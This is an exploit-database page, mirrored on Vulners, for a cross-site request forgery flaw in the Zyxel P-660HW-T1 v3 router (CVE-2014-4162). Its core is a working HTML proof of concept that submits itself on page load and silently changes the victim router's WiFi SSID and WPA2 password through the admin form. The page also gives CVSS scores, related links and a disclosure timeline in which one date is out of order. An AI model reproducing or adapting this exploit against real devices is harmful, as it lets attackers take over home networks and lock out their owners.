Lucene search
+L

ZYXEL P-660HW-T1 3 Wireless Router - Cross-Site Request Forgery

🗓️ 26 May 2014 00:00:00Reported by Mustafa ALTINKAYNAKType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 33 Views

Zyxel P-660HW-T1 v3 Wireless Router CSRF Vulnerabilities, can run remote code destinatio

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2014-4162
16 Jun 201418:00
cve
Cvelist
CVE-2014-4162
16 Jun 201418:00
cvelist
EUVD
EUVD-2014-4093
7 Oct 202500:30
euvd
Kitploit
cve-search - A Tool To Perform Local Searches For Known Vulnerabilities
17 Oct 201713:30
kitploit
n0where
Perform Local Searches For Known Vulnerabilities: cve-search
30 Oct 201700:56
n0where
NVD
CVE-2014-4162
16 Jun 201418:55
nvd
Prion
Cross site request forgery (csrf)
16 Jun 201418:55
prion
# Exploit Title: Zyxel P-660HW-T1 v3 Wireless Router - CSRF Vulnerabilities
# Date: 05/22/2014
# Author: Mustafa ALTINKAYNAK
# Vendor Homepage:http://www.zyxel.com/tr/tr/products_services/p_660hw_series.shtml?t=p
# Category: Hardware/Wireless Router
# Tested on: Zyxel P-660HW-T1 v3 Wireless Router
# Patch/ Fix: Vendor has not provided any fix for this yet
---------------------------

Technical Details
---------------------------
This vulnerability was tested at the P-660HW-T1 devices. Admin panel is open you can run remote code destination.
You can send the form below to prepare the target. Please offending. Being partners in crime.

Disclosure Timeline
---------------------------
05/21/2014  Contacted Vendor
05/22/2014  Vendor Replied
04/22/2014  Vulnerability Explained (No reply received)
05/23/2014  Full Disclosure

Exploit Code
---------------------------

Change Wifi (WPA2/PSK) password & SSID by CSRF
---------------------------------------------------------------------------------
<html>
<body onload="document.form.submit();">
<form action="http://192.168.1.1/Forms/WLAN_General_1"
method="POST" name="form">
<input type="hidden" name="EnableWLAN" value="on">
<input type="hidden" name="Channel_ID" value="00000005">
<input type="hidden" name="ESSID" value="WIFI NAME">
<input type="hidden" name="Security_Sel" value="00000002">
<input type="hidden" name="SecurityFlag" value="0">
<input type="hidden" name="WLANCfgPSK" value="123456">
<input type="hidden" name="WLANCfgWPATimer" value="1800">
<input type="hidden" name="QoS_Sel" value="00000000">
<input type="hidden" name="sysSubmit" value="Uygula">
</form>
</body>
</html>

-----------

Mustafa ALTINKAYNAK
twitter : @m_altinkaynak <https://twitter.com/m_altinkaynak>
www.mustafaaltinkaynak.com

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 May 2014 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 26.8
EPSS0.02635
33